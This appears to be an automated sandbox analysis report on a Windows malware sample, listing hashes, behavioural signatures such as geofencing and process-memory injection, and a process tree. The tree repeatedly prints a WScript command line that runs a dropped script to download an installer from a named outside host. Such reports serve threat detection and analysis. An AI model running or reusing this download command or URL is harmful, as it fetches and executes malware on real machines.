Analysis
max time kernel: 153s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-11-2022 08:48
Static task: static1
Behavioral task: behavioral1
  Sample: ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
  Resource: win10v2004-20220812-en
General
Target: ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
Size: 184KB
MD5: 8bbee466ddc779509f7b5d3ca53b5356
SHA1: f8bb919b6c655d571fb309af43e621b4ac6e63b9
SHA256: ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367
SHA512: c81fbfc36b438b145f9f80ff3ac10b10843f05ed499b8299e6443131df242c7c58795c254ed82baab0b904710c678f54b05344b5c73438e9b60d1d15908d6f11
SSDEEP: 3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3B:/7BSH8zUB+nGESaaRvoB7FJNndnU
Malware Config
Signatures
- Blocklisted process makes network request (12 IoCs)
  flow | pid | Process
  4 | 5116 | WScript.exe
  8 | 5116 | WScript.exe
  22 | 3588 | WScript.exe
  24 | 3588 | WScript.exe
  34 | 3588 | WScript.exe
  39 | 3588 | WScript.exe
  42 | 3588 | WScript.exe
  47 | 3588 | WScript.exe
  48 | 3164 | WScript.exe
  49 | 3164 | WScript.exe
  51 | 1036 | WScript.exe
  56 | 1036 | WScript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
- Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  description | flow | ioc
  HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 48 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious use of WriteProcessMemory (12 IoCs)
  description | pid | Process | procid_target
  PID 4992 wrote to memory of 5116 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 80
  PID 4992 wrote to memory of 5116 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 80
  PID 4992 wrote to memory of 5116 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 80
  PID 4992 wrote to memory of 3588 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 82
  PID 4992 wrote to memory of 3588 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 82
  PID 4992 wrote to memory of 3588 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 82
  PID 4992 wrote to memory of 3164 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 83
  PID 4992 wrote to memory of 3164 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 83
  PID 4992 wrote to memory of 3164 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 83
  PID 4992 wrote to memory of 1036 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 84
  PID 4992 wrote to memory of 1036 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 84
  PID 4992 wrote to memory of 1036 | 4992 | ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe | 84
Processes
- C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ab898d4431f21c0a5533faaf9862daf0feb23e63b737be4e4c84c16b822a6367.exe"
  PID: 4992
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
    PID: 5116
    - Blocklisted process makes network request
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
    PID: 3588
    - Blocklisted process makes network request
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
    PID: 3164
    - Blocklisted process makes network request
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7D43.js" http://www.djapp.info/?domain=WuJFSpxpIJ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf7D43.exe
    PID: 1036
    - Blocklisted process makes network request
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 3KB
  MD5: 3813cab188d1de6f92f8b82c2059991b
  SHA1: 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
  SHA256: a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
  SHA512: 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76